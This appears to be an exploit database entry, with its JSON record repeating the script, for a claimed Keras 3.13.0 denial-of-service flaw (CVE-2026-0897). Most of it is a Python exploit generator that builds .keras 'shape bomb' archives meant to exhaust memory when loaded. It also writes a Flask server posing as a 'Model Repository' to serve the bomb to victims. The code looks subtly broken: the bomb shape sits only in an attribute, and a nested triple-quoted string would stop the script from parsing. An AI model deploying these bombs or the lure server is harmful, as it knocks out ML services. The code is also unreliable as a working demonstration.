📄 Keras 3.13.0 HDF5 Shape Bomb Denial of Service

7.5 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Description

This script is a security research tool demonstrating a denial of service vulnerability in Keras model loading through malicious HDF5 shape bombs. It generates .keras model archives containing artificially declared extremely large tensor shapes...

Visit Original Source

Basic Information

ID PACKETSTORM:219685

Published Apr 23, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Keras 3.13.0 HDF5 Shape Bomb Denial-of-Service Exploit Generator |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://pypi.org/project/keras/ |
==================================================================================================================================

[+] Summary : This script is a security research tool demonstrating a Denial-of-Service (DoS) vulnerability in Keras model loading through malicious HDF5 “shape bombs.”
It generates .keras model archives containing artificially declared extremely large tensor shapes designed to force excessive memory allocation during deserialization.

[+] POC :

#!/usr/bin/env python3

import os
import sys
import json
import h5py
import zipfile
import struct
import argparse
import logging
import numpy as np
from pathlib import Path
from typing import List, Dict, Optional, Tuple
from datetime import datetime

logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)

MAX_RANK_BEFORE_FIX = 64
MAX_BYTES_BEFORE_FIX = float('inf')
EVIL_SHAPES = {
"petabyte_bomb": (1000000, 1000000, 1000000),
"terabyte_bomb": (100000, 100000, 10000),
"gigabyte_bomb": (50000, 50000, 400),
"rank_bomb": tuple([1000] * 100),
"overflow_bomb": (2**31, 2**31, 2**31),
"null_bomb": (0, 2**31, 2**31),
"negative_bomb": (-1, 1000000, 1000000),
"fractional_bomb": (1000000, 1000000, 1000000, 1000000),
}

class HDF5ShapeBomb:
"""Generate malicious HDF5 files with shape bombs"""

def __init__(self, output_file: str = "malicious_model.keras"):
self.output_file = output_file
self.temp_dir = Path("temp_hdf5_bomb")
self.temp_dir.mkdir(exist_ok=True)

def _create_shape_bomb_hdf5(self, shape: Tuple[int, ...], dtype: str = "float32",
dataset_name: str = "layers/dense/vars/0") -> str:
"""
Create HDF5 file with malicious shape declaration

Args:
shape: Declared tensor shape (actual data is minimal)
dtype: Data type (affects memory calculation)
dataset_name: Name of the dataset

Returns:
Path to created HDF5 file
"""
h5_path = self.temp_dir / "model.weights.h5"

with h5py.File(h5_path, "w", libver="latest") as f:

groups = dataset_name.split('/')
current = f
for group in groups[:-1]:
if group not in current:
current = current.create_group(group)
current = current[group]
dataset = current.create_dataset(
groups[-1],
shape=(0,),
maxshape=(None,),
dtype=dtype,
data=np.array([], dtype=dtype)
)

if hasattr(dataset, "attrs"):
dataset.attrs["DECLARED_SHAPE"] = shape
dataset.attrs["SHAPE_BOMB"] = True
dataset.attrs["TARGET_MEMORY_BYTES"] = self._calculate_memory(shape, dtype)

logger.info(f"[+] Created HDF5 bomb at {h5_path}")
logger.info(f" Declared shape: {shape}")
logger.info(f" Memory required: {self._format_bytes(self._calculate_memory(shape, dtype))}")

return str(h5_path)

def _calculate_memory(self, shape: Tuple[int, ...], dtype: str) -> int:
"""Calculate memory required for shape"""
try:
import math
total_elements = math.prod(shape)
except OverflowError:
total_elements = float('inf')

dtype_size = np.dtype(dtype).itemsize
return total_elements * dtype_size

def _format_bytes(self, bytes_count: int) -> str:
"""Format bytes to human readable"""
if bytes_count >= 1024**4:
return f"{bytes_count / 1024**4:.2f} PB"
elif bytes_count >= 1024**3:
return f"{bytes_count / 1024**3:.2f} TB"
elif bytes_count >= 1024**2:
return f"{bytes_count / 1024**2:.2f} GB"
elif bytes_count >= 1024:
return f"{bytes_count / 1024:.2f} MB"
else:
return f"{bytes_count} B"

def _create_config_json(self, model_config: Dict = None) -> str:
"""Create Keras config.json"""
if model_config is None:
model_config = {
"class_name": "Sequential",
"config": {
"name": "sequential",
"trainable": True,
"layers": [
{
"class_name": "Dense",
"config": {
"name": "dense",
"trainable": True,
"dtype": "float32",
"units": 10,
"activation": "relu"
}
}
]
},
"keras_version": "3.0.0",
"backend": "tensorflow"
}

config_path = self.temp_dir / "config.json"
with open(config_path, "w") as f:
json.dump(model_config, f, indent=2)

return str(config_path)

def _create_metadata_json(self) -> str:
"""Create Keras metadata.json"""
metadata = {
"keras_version": "3.0.0",
"backend": "tensorflow",
"model_config": {
"class_name": "Sequential",
"config": {"name": "sequential", "trainable": True}
}
}

metadata_path = self.temp_dir / "metadata.json"
with open(metadata_path, "w") as f:
json.dump(metadata, f, indent=2)

return str(metadata_path)

def build_keras_archive(self, shape: Tuple[int, ...],
dtype: str = "float32",
dataset_name: str = "layers/dense/vars/0") -> str:
"""
Build complete .keras archive with shape bomb

Args:
shape: Malicious shape declaration
dtype: Data type
dataset_name: Dataset name in HDF5

Returns:
Path to generated .keras file
"""
logger.info(f"[*] Building Keras archive with shape bomb: {shape}")

h5_path = self._create_shape_bomb_hdf5(shape, dtype, dataset_name)

config_path = self._create_config_json()
metadata_path = self._create_metadata_json()

with zipfile.ZipFile(self.output_file, "w", zipfile.ZIP_DEFLATED) as zf:
zf.write(h5_path, "model.weights.h5")
zf.write(config_path, "config.json")
zf.write(metadata_path, "metadata.json")

for f in [h5_path, config_path, metadata_path]:
if os.path.exists(f):
os.unlink(f)

self.temp_dir.rmdir()

file_size = os.path.getsize(self.output_file)
logger.info(f"[+] Keras archive created: {self.output_file}")
logger.info(f" File size: {self._format_bytes(file_size)}")
logger.info(f" Memory impact: {self._format_bytes(self._calculate_memory(shape, dtype))}")
logger.info(f" Amplification ratio: {self._calculate_memory(shape, dtype) / file_size:.0f}x")

return self.output_file

class KerasDoSAttack:
"""Execute DoS attack against vulnerable Keras installations"""

def __init__(self, target_model_path: str = None):
self.target_model_path = target_model_path

def test_local_vulnerability(self, model_path: str) -> bool:
"""
Test if local Keras installation is vulnerable

Args:
model_path: Path to malicious model

Returns:
True if crash occurred (vulnerable), False otherwise
"""
try:
import keras
logger.info("[*] Attempting to load malicious model...")

model = keras.saving.load_model(model_path)

logger.warning("[!] Model loaded successfully - Keras may be patched!")
return False

except MemoryError as e:
logger.error(f"[!!!] MemoryError: {e}")
return True
except Exception as e:
logger.error(f"[!!!] Crash: {e}")
return True

def create_remote_exploit_script(self, output_file: str = "exploit_server.py") -> str:
"""
Create a malicious model server that serves shape bombs

Args:
output_file: Output script name

Returns:
Path to created script
"""
script_content = '''#!/usr/bin/env python3
"""Malicious model server for CVE-2026-0897"""

from flask import Flask, send_file, request
import os
import zipfile
import h5py
import json

app = Flask(__name__)

EVIL_SHAPE = (1000000, 1000000, 1000000) # 4 PB bomb

def create_malicious_model():
"""Generate shape bomb on demand"""
import tempfile
import numpy as np

temp_dir = tempfile.mkdtemp()
model_path = os.path.join(temp_dir, "malicious.keras")

with h5py.File(os.path.join(temp_dir, "model.weights.h5"), "w") as f:
dataset = f.create_dataset(
"layers/dense/vars/0",
shape=(0,),
maxshape=(None,),
dtype="float32",
data=np.array([], dtype="float32")
)
dataset.attrs["DECLARED_SHAPE"] = EVIL_SHAPE
config = {
"class_name": "Sequential",
"config": {"name": "sequential", "trainable": True},
"keras_version": "3.0.0"
}

with zipfile.ZipFile(model_path, "w") as zf:
zf.write(os.path.join(temp_dir, "model.weights.h5"), "model.weights.h5")
zf.writestr("config.json", json.dumps(config))

return model_path

@app.route('/model.keras')
def serve_malicious_model():
"""Serve the shape bomb model"""
model_path = create_malicious_model()
return send_file(model_path, as_attachment=True)

@app.route('/')
def index():
return '''
<h1>Model Repository</h1>
<p>Download models for your ML pipeline:</p>
<a href="/model.keras">Download model.keras (latest)</a>
'''

if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080)
'''

with open(output_file, 'w') as f:
f.write(script_content)

os.chmod(output_file, 0o755)
logger.info(f"[+] Remote exploit server script created: {output_file}")
return output_file
class ExploitTester:
"""Test and validate the exploit"""

@staticmethod
def test_memory_impact(shape: Tuple[int, ...], dtype: str = "float32") -> Dict:
"""Calculate theoretical memory impact"""
import math

try:
elements = math.prod(shape)
bytes_needed = elements * np.dtype(dtype).itemsize

return {
"shape": shape,
"elements": elements,
"bytes": bytes_needed,
"bytes_formatted": format_bytes(bytes_needed),
"dtype": dtype,
"overflow": False
}
except OverflowError:
return {
"shape": shape,
"elements": float('inf'),
"bytes": float('inf'),
"bytes_formatted": "INFINITE",
"dtype": dtype,
"overflow": True
}

@staticmethod
def scan_keras_version() -> Dict:
"""Check Keras version and vulnerability status"""
try:
import keras
version = keras.__version__

# Parse version
parts = [int(x) for x in version.split('.')[:3]]
is_vulnerable = False

if parts[0] == 3:
if 0 <= parts[1] <= 13:
is_vulnerable = True

return {
"version": version,
"is_vulnerable": is_vulnerable,
"has_fix": not is_vulnerable
}
except ImportError:
return {
"version": None,
"is_vulnerable": False,
"has_fix": False,
"error": "Keras not installed"
}

def format_bytes(bytes_count):
"""Format bytes to human readable"""
if bytes_count >= 1024**4:
return f"{bytes_count / 1024**4:.2f} PB"
elif bytes_count >= 1024**3:
return f"{bytes_count / 1024**3:.2f} TB"
elif bytes_count >= 1024**2:
return f"{bytes_count / 1024**2:.2f} GB"
elif bytes_count >= 1024:
return f"{bytes_count / 1024:.2f} MB"
else:
return f"{bytes_count} B"
def main():
parser = argparse.ArgumentParser(
description='CVE-2026-0897 - Google Keras DoS Exploit (HDF5 Shape Bomb)',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
python exploit.py --shape petabyte_bomb --output malicious.keras
python exploit.py --shape 1000000,1000000,1000000 --output bomb.keras
python exploit.py --test --model malicious.keras
python exploit.py --all --output-dir ./bombs/
python exploit.py --server --port 8080
python exploit.py --check-version
"""
)

parser.add_argument('--shape', help='Shape bomb type or custom dimensions (e.g., 1000,1000,1000)')
parser.add_argument('--output', '-o', default='malicious_model.keras', help='Output .keras file')
parser.add_argument('--output-dir', help='Directory for multiple bombs')
parser.add_argument('--all', action='store_true', help='Generate all bomb types')
parser.add_argument('--test', action='store_true', help='Test vulnerability with generated model')
parser.add_argument('--model', help='Model file to test')
parser.add_argument('--server', action='store_true', help='Create remote exploit server script')
parser.add_argument('--port', type=int, default=8080, help='Port for exploit server')
parser.add_argument('--check-version', action='store_true', help='Check Keras version vulnerability')
parser.add_argument('--dtype', default='float32', help='Data type (float32, float64, int8, etc.)')
parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')

args = parser.parse_args()

print("""
========================================
CVE-2026-0897 - Keras DoS Exploit
HDF5 Shape Bomb - Resource Exhaustion
========================================
""")

if args.check_version:
info = ExploitTester.scan_keras_version()
print(f"[*] Keras version: {info['version'] or 'Not installed'}")
if info.get('is_vulnerable'):
print("[!!!] VULNERABLE version detected! (3.0.0 - 3.13.0)")
elif info.get('has_fix'):
print("[+] Keras appears patched (version > 3.13.0)")
else:
print("[?] Unable to determine vulnerability status")
return

if args.server:
attacker = KerasDoSAttack()
script_path = attacker.create_remote_exploit_script(f"exploit_server_{args.port}.py")
print(f"\n[+] Exploit server script created: {script_path}")
print(f"[*] Run: python3 {script_path}")
print(f"[*] Victims will download malicious models from http://your-server:8080/model.keras")
return

if args.all:
if not args.output_dir:
args.output_dir = "shape_bombs"

os.makedirs(args.output_dir, exist_ok=True)

for bomb_name, bomb_shape in EVIL_SHAPES.items():
output_file = os.path.join(args.output_dir, f"{bomb_name}.keras")
generator = HDF5ShapeBomb(output_file)

print(f"\n[*] Generating {bomb_name}: {bomb_shape}")
generator.build_keras_archive(bomb_shape, args.dtype)

print(f"\n[+] All bombs generated in {args.output_dir}/")
return
if args.shape:

if args.shape in EVIL_SHAPES:
shape = EVIL_SHAPES[args.shape]
else:
try:
shape = tuple(int(x.strip()) for x in args.shape.split(','))
except:
print(f"[!] Invalid shape format: {args.shape}")
return

impact = ExploitTester.test_memory_impact(shape, args.dtype)
print(f"[*] Shape bomb configuration:")
print(f" Dimensions: {impact['shape']}")
print(f" Total elements: {impact['elements']}")
print(f" Memory required: {impact['bytes_formatted']}")
print(f" Data type: {impact['dtype']}")

if impact.get('overflow'):
print("[!!!] INTEGER OVERFLOW DETECTED - May bypass some checks!")

generator = HDF5ShapeBomb(args.output)
generator.build_keras_archive(shape, args.dtype)

if args.test:
print("\n[*] Testing vulnerability...")
attacker = KerasDoSAttack()
is_vulnerable = attacker.test_local_vulnerability(args.output)

if is_vulnerable:
print("\n[!!!] Keras IS VULNERABLE! Process crashed.")
else:
print("\n[+] Keras appears patched or model was safe.")

else:
parser.print_help()

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-23T17:44:01",
    "description": "This script is a security research tool demonstrating a denial of service vulnerability in Keras model loading through malicious HDF5 shape bombs. It generates .keras model archives containing artificially declared extremely large tensor shapes...",
    "published": "2026-04-23T00:00:00",
    "modified": "2026-04-23T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Keras 3.13.0 HDF5 Shape Bomb Denial of Service",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219685",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-0897"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Keras 3.13.0 HDF5 Shape Bomb Denial-of-Service Exploit Generator                                                 |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://pypi.org/project/keras/                                                                                  |\n    ==================================================================================================================================\n    \n    [+] Summary    : This script is a security research tool demonstrating a Denial-of-Service (DoS) vulnerability in Keras model loading through malicious HDF5 \u201cshape bombs.\u201d \n                     It generates .keras model archives containing artificially declared extremely large tensor shapes designed to force excessive memory allocation during deserialization.\n    \n    [+] POC        :  \n    \n    #!/usr/bin/env python3\n    \n    import os\n    import sys\n    import json\n    import h5py\n    import zipfile\n    import struct\n    import argparse\n    import logging\n    import numpy as np\n    from pathlib import Path\n    from typing import List, Dict, Optional, Tuple\n    from datetime import datetime\n    \n    logging.basicConfig(\n        level=logging.INFO,\n        format='%(asctime)s - %(levelname)s - %(message)s'\n    )\n    logger = logging.getLogger(__name__)\n    \n    MAX_RANK_BEFORE_FIX = 64\n    MAX_BYTES_BEFORE_FIX = float('inf')  \n    EVIL_SHAPES = {\n        \"petabyte_bomb\": (1000000, 1000000, 1000000), \n        \"terabyte_bomb\": (100000, 100000, 10000),   \n        \"gigabyte_bomb\": (50000, 50000, 400),       \n        \"rank_bomb\": tuple([1000] * 100),          \n        \"overflow_bomb\": (2**31, 2**31, 2**31),   \n        \"null_bomb\": (0, 2**31, 2**31),            \n        \"negative_bomb\": (-1, 1000000, 1000000),   \n        \"fractional_bomb\": (1000000, 1000000, 1000000, 1000000),\n    }\n    \n    class HDF5ShapeBomb:\n        \"\"\"Generate malicious HDF5 files with shape bombs\"\"\"\n        \n        def __init__(self, output_file: str = \"malicious_model.keras\"):\n            self.output_file = output_file\n            self.temp_dir = Path(\"temp_hdf5_bomb\")\n            self.temp_dir.mkdir(exist_ok=True)\n            \n        def _create_shape_bomb_hdf5(self, shape: Tuple[int, ...], dtype: str = \"float32\", \n                                     dataset_name: str = \"layers/dense/vars/0\") -> str:\n            \"\"\"\n            Create HDF5 file with malicious shape declaration\n            \n            Args:\n                shape: Declared tensor shape (actual data is minimal)\n                dtype: Data type (affects memory calculation)\n                dataset_name: Name of the dataset\n                \n            Returns:\n                Path to created HDF5 file\n            \"\"\"\n            h5_path = self.temp_dir / \"model.weights.h5\"\n            \n            with h5py.File(h5_path, \"w\", libver=\"latest\") as f:\n    \n                groups = dataset_name.split('/')\n                current = f\n                for group in groups[:-1]:\n                    if group not in current:\n                        current = current.create_group(group)\n                    current = current[group]\n                dataset = current.create_dataset(\n                    groups[-1],\n                    shape=(0,),          \n                    maxshape=(None,),\n                    dtype=dtype,\n                    data=np.array([], dtype=dtype)\n                )\n                \n                if hasattr(dataset, \"attrs\"):\n                    dataset.attrs[\"DECLARED_SHAPE\"] = shape\n                    dataset.attrs[\"SHAPE_BOMB\"] = True\n                    dataset.attrs[\"TARGET_MEMORY_BYTES\"] = self._calculate_memory(shape, dtype)\n            \n            logger.info(f\"[+] Created HDF5 bomb at {h5_path}\")\n            logger.info(f\"    Declared shape: {shape}\")\n            logger.info(f\"    Memory required: {self._format_bytes(self._calculate_memory(shape, dtype))}\")\n            \n            return str(h5_path)\n        \n        def _calculate_memory(self, shape: Tuple[int, ...], dtype: str) -> int:\n            \"\"\"Calculate memory required for shape\"\"\"\n            try:\n                import math\n                total_elements = math.prod(shape)\n            except OverflowError:\n                total_elements = float('inf')\n            \n            dtype_size = np.dtype(dtype).itemsize\n            return total_elements * dtype_size\n        \n        def _format_bytes(self, bytes_count: int) -> str:\n            \"\"\"Format bytes to human readable\"\"\"\n            if bytes_count >= 1024**4:\n                return f\"{bytes_count / 1024**4:.2f} PB\"\n            elif bytes_count >= 1024**3:\n                return f\"{bytes_count / 1024**3:.2f} TB\"\n            elif bytes_count >= 1024**2:\n                return f\"{bytes_count / 1024**2:.2f} GB\"\n            elif bytes_count >= 1024:\n                return f\"{bytes_count / 1024:.2f} MB\"\n            else:\n                return f\"{bytes_count} B\"\n        \n        def _create_config_json(self, model_config: Dict = None) -> str:\n            \"\"\"Create Keras config.json\"\"\"\n            if model_config is None:\n                model_config = {\n                    \"class_name\": \"Sequential\",\n                    \"config\": {\n                        \"name\": \"sequential\",\n                        \"trainable\": True,\n                        \"layers\": [\n                            {\n                                \"class_name\": \"Dense\",\n                                \"config\": {\n                                    \"name\": \"dense\",\n                                    \"trainable\": True,\n                                    \"dtype\": \"float32\",\n                                    \"units\": 10,\n                                    \"activation\": \"relu\"\n                                }\n                            }\n                        ]\n                    },\n                    \"keras_version\": \"3.0.0\",\n                    \"backend\": \"tensorflow\"\n                }\n            \n            config_path = self.temp_dir / \"config.json\"\n            with open(config_path, \"w\") as f:\n                json.dump(model_config, f, indent=2)\n            \n            return str(config_path)\n        \n        def _create_metadata_json(self) -> str:\n            \"\"\"Create Keras metadata.json\"\"\"\n            metadata = {\n                \"keras_version\": \"3.0.0\",\n                \"backend\": \"tensorflow\",\n                \"model_config\": {\n                    \"class_name\": \"Sequential\",\n                    \"config\": {\"name\": \"sequential\", \"trainable\": True}\n                }\n            }\n            \n            metadata_path = self.temp_dir / \"metadata.json\"\n            with open(metadata_path, \"w\") as f:\n                json.dump(metadata, f, indent=2)\n            \n            return str(metadata_path)\n        \n        def build_keras_archive(self, shape: Tuple[int, ...], \n                               dtype: str = \"float32\",\n                               dataset_name: str = \"layers/dense/vars/0\") -> str:\n            \"\"\"\n            Build complete .keras archive with shape bomb\n            \n            Args:\n                shape: Malicious shape declaration\n                dtype: Data type\n                dataset_name: Dataset name in HDF5\n                \n            Returns:\n                Path to generated .keras file\n            \"\"\"\n            logger.info(f\"[*] Building Keras archive with shape bomb: {shape}\")\n    \n            h5_path = self._create_shape_bomb_hdf5(shape, dtype, dataset_name)\n    \n            config_path = self._create_config_json()\n            metadata_path = self._create_metadata_json()\n    \n            with zipfile.ZipFile(self.output_file, \"w\", zipfile.ZIP_DEFLATED) as zf:\n                zf.write(h5_path, \"model.weights.h5\")\n                zf.write(config_path, \"config.json\")\n                zf.write(metadata_path, \"metadata.json\")\n    \n            for f in [h5_path, config_path, metadata_path]:\n                if os.path.exists(f):\n                    os.unlink(f)\n            \n            self.temp_dir.rmdir()\n            \n            file_size = os.path.getsize(self.output_file)\n            logger.info(f\"[+] Keras archive created: {self.output_file}\")\n            logger.info(f\"    File size: {self._format_bytes(file_size)}\")\n            logger.info(f\"    Memory impact: {self._format_bytes(self._calculate_memory(shape, dtype))}\")\n            logger.info(f\"    Amplification ratio: {self._calculate_memory(shape, dtype) / file_size:.0f}x\")\n            \n            return self.output_file\n    \n    class KerasDoSAttack:\n        \"\"\"Execute DoS attack against vulnerable Keras installations\"\"\"\n        \n        def __init__(self, target_model_path: str = None):\n            self.target_model_path = target_model_path\n        \n        def test_local_vulnerability(self, model_path: str) -> bool:\n            \"\"\"\n            Test if local Keras installation is vulnerable\n            \n            Args:\n                model_path: Path to malicious model\n                \n            Returns:\n                True if crash occurred (vulnerable), False otherwise\n            \"\"\"\n            try:\n                import keras\n                logger.info(\"[*] Attempting to load malicious model...\")\n    \n                model = keras.saving.load_model(model_path)\n                \n                logger.warning(\"[!] Model loaded successfully - Keras may be patched!\")\n                return False\n                \n            except MemoryError as e:\n                logger.error(f\"[!!!] MemoryError: {e}\")\n                return True\n            except Exception as e:\n                logger.error(f\"[!!!] Crash: {e}\")\n                return True\n        \n        def create_remote_exploit_script(self, output_file: str = \"exploit_server.py\") -> str:\n            \"\"\"\n            Create a malicious model server that serves shape bombs\n            \n            Args:\n                output_file: Output script name\n                \n            Returns:\n                Path to created script\n            \"\"\"\n            script_content = '''#!/usr/bin/env python3\n    \"\"\"Malicious model server for CVE-2026-0897\"\"\"\n    \n    from flask import Flask, send_file, request\n    import os\n    import zipfile\n    import h5py\n    import json\n    \n    app = Flask(__name__)\n    \n    EVIL_SHAPE = (1000000, 1000000, 1000000)  # 4 PB bomb\n    \n    def create_malicious_model():\n        \"\"\"Generate shape bomb on demand\"\"\"\n        import tempfile\n        import numpy as np\n        \n        temp_dir = tempfile.mkdtemp()\n        model_path = os.path.join(temp_dir, \"malicious.keras\")\n    \n        with h5py.File(os.path.join(temp_dir, \"model.weights.h5\"), \"w\") as f:\n            dataset = f.create_dataset(\n                \"layers/dense/vars/0\",\n                shape=(0,),\n                maxshape=(None,),\n                dtype=\"float32\",\n                data=np.array([], dtype=\"float32\")\n            )\n            dataset.attrs[\"DECLARED_SHAPE\"] = EVIL_SHAPE\n        config = {\n            \"class_name\": \"Sequential\",\n            \"config\": {\"name\": \"sequential\", \"trainable\": True},\n            \"keras_version\": \"3.0.0\"\n        }\n        \n        with zipfile.ZipFile(model_path, \"w\") as zf:\n            zf.write(os.path.join(temp_dir, \"model.weights.h5\"), \"model.weights.h5\")\n            zf.writestr(\"config.json\", json.dumps(config))\n        \n        return model_path\n    \n    @app.route('/model.keras')\n    def serve_malicious_model():\n        \"\"\"Serve the shape bomb model\"\"\"\n        model_path = create_malicious_model()\n        return send_file(model_path, as_attachment=True)\n    \n    @app.route('/')\n    def index():\n        return '''\n        <h1>Model Repository</h1>\n        <p>Download models for your ML pipeline:</p>\n        <a href=\"/model.keras\">Download model.keras (latest)</a>\n        '''\n    \n    if __name__ == '__main__':\n        app.run(host='0.0.0.0', port=8080)\n    '''\n            \n            with open(output_file, 'w') as f:\n                f.write(script_content)\n            \n            os.chmod(output_file, 0o755)\n            logger.info(f\"[+] Remote exploit server script created: {output_file}\")\n            return output_file\n    class ExploitTester:\n        \"\"\"Test and validate the exploit\"\"\"\n        \n        @staticmethod\n        def test_memory_impact(shape: Tuple[int, ...], dtype: str = \"float32\") -> Dict:\n            \"\"\"Calculate theoretical memory impact\"\"\"\n            import math\n            \n            try:\n                elements = math.prod(shape)\n                bytes_needed = elements * np.dtype(dtype).itemsize\n                \n                return {\n                    \"shape\": shape,\n                    \"elements\": elements,\n                    \"bytes\": bytes_needed,\n                    \"bytes_formatted\": format_bytes(bytes_needed),\n                    \"dtype\": dtype,\n                    \"overflow\": False\n                }\n            except OverflowError:\n                return {\n                    \"shape\": shape,\n                    \"elements\": float('inf'),\n                    \"bytes\": float('inf'),\n                    \"bytes_formatted\": \"INFINITE\",\n                    \"dtype\": dtype,\n                    \"overflow\": True\n                }\n        \n        @staticmethod\n        def scan_keras_version() -> Dict:\n            \"\"\"Check Keras version and vulnerability status\"\"\"\n            try:\n                import keras\n                version = keras.__version__\n                \n                # Parse version\n                parts = [int(x) for x in version.split('.')[:3]]\n                is_vulnerable = False\n                \n                if parts[0] == 3:\n                    if 0 <= parts[1] <= 13:\n                        is_vulnerable = True\n                \n                return {\n                    \"version\": version,\n                    \"is_vulnerable\": is_vulnerable,\n                    \"has_fix\": not is_vulnerable\n                }\n            except ImportError:\n                return {\n                    \"version\": None,\n                    \"is_vulnerable\": False,\n                    \"has_fix\": False,\n                    \"error\": \"Keras not installed\"\n                }\n    \n    def format_bytes(bytes_count):\n        \"\"\"Format bytes to human readable\"\"\"\n        if bytes_count >= 1024**4:\n            return f\"{bytes_count / 1024**4:.2f} PB\"\n        elif bytes_count >= 1024**3:\n            return f\"{bytes_count / 1024**3:.2f} TB\"\n        elif bytes_count >= 1024**2:\n            return f\"{bytes_count / 1024**2:.2f} GB\"\n        elif bytes_count >= 1024:\n            return f\"{bytes_count / 1024:.2f} MB\"\n        else:\n            return f\"{bytes_count} B\"\n    def main():\n        parser = argparse.ArgumentParser(\n            description='CVE-2026-0897 - Google Keras DoS Exploit (HDF5 Shape Bomb)',\n            formatter_class=argparse.RawDescriptionHelpFormatter,\n            epilog=\"\"\"\n    Examples:\n      python exploit.py --shape petabyte_bomb --output malicious.keras\n      python exploit.py --shape 1000000,1000000,1000000 --output bomb.keras\n      python exploit.py --test --model malicious.keras\n      python exploit.py --all --output-dir ./bombs/\n      python exploit.py --server --port 8080\n      python exploit.py --check-version\n            \"\"\"\n        )\n        \n        parser.add_argument('--shape', help='Shape bomb type or custom dimensions (e.g., 1000,1000,1000)')\n        parser.add_argument('--output', '-o', default='malicious_model.keras', help='Output .keras file')\n        parser.add_argument('--output-dir', help='Directory for multiple bombs')\n        parser.add_argument('--all', action='store_true', help='Generate all bomb types')\n        parser.add_argument('--test', action='store_true', help='Test vulnerability with generated model')\n        parser.add_argument('--model', help='Model file to test')\n        parser.add_argument('--server', action='store_true', help='Create remote exploit server script')\n        parser.add_argument('--port', type=int, default=8080, help='Port for exploit server')\n        parser.add_argument('--check-version', action='store_true', help='Check Keras version vulnerability')\n        parser.add_argument('--dtype', default='float32', help='Data type (float32, float64, int8, etc.)')\n        parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')\n        \n        args = parser.parse_args()\n        \n        print(\"\"\"\n    ========================================\n      CVE-2026-0897 - Keras DoS Exploit\n      HDF5 Shape Bomb - Resource Exhaustion\n    ========================================\n        \"\"\")\n    \n        if args.check_version:\n            info = ExploitTester.scan_keras_version()\n            print(f\"[*] Keras version: {info['version'] or 'Not installed'}\")\n            if info.get('is_vulnerable'):\n                print(\"[!!!] VULNERABLE version detected! (3.0.0 - 3.13.0)\")\n            elif info.get('has_fix'):\n                print(\"[+] Keras appears patched (version > 3.13.0)\")\n            else:\n                print(\"[?] Unable to determine vulnerability status\")\n            return\n    \n        if args.server:\n            attacker = KerasDoSAttack()\n            script_path = attacker.create_remote_exploit_script(f\"exploit_server_{args.port}.py\")\n            print(f\"\\n[+] Exploit server script created: {script_path}\")\n            print(f\"[*] Run: python3 {script_path}\")\n            print(f\"[*] Victims will download malicious models from http://your-server:8080/model.keras\")\n            return\n    \n        if args.all:\n            if not args.output_dir:\n                args.output_dir = \"shape_bombs\"\n            \n            os.makedirs(args.output_dir, exist_ok=True)\n            \n            for bomb_name, bomb_shape in EVIL_SHAPES.items():\n                output_file = os.path.join(args.output_dir, f\"{bomb_name}.keras\")\n                generator = HDF5ShapeBomb(output_file)\n                \n                print(f\"\\n[*] Generating {bomb_name}: {bomb_shape}\")\n                generator.build_keras_archive(bomb_shape, args.dtype)\n            \n            print(f\"\\n[+] All bombs generated in {args.output_dir}/\")\n            return\n        if args.shape:\n    \n            if args.shape in EVIL_SHAPES:\n                shape = EVIL_SHAPES[args.shape]\n            else:\n                try:\n                    shape = tuple(int(x.strip()) for x in args.shape.split(','))\n                except:\n                    print(f\"[!] Invalid shape format: {args.shape}\")\n                    return\n    \n            impact = ExploitTester.test_memory_impact(shape, args.dtype)\n            print(f\"[*] Shape bomb configuration:\")\n            print(f\"    Dimensions: {impact['shape']}\")\n            print(f\"    Total elements: {impact['elements']}\")\n            print(f\"    Memory required: {impact['bytes_formatted']}\")\n            print(f\"    Data type: {impact['dtype']}\")\n            \n            if impact.get('overflow'):\n                print(\"[!!!] INTEGER OVERFLOW DETECTED - May bypass some checks!\")\n    \n            generator = HDF5ShapeBomb(args.output)\n            generator.build_keras_archive(shape, args.dtype)\n    \n            if args.test:\n                print(\"\\n[*] Testing vulnerability...\")\n                attacker = KerasDoSAttack()\n                is_vulnerable = attacker.test_local_vulnerability(args.output)\n                \n                if is_vulnerable:\n                    print(\"\\n[!!!] Keras IS VULNERABLE! Process crashed.\")\n                else:\n                    print(\"\\n[+] Keras appears patched or model was safe.\")\n        \n        else:\n            parser.print_help()\n    \n    if __name__ == \"__main__\":\n        main()\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219685",
    "cvss": {
        "score": 7.5,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219685/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
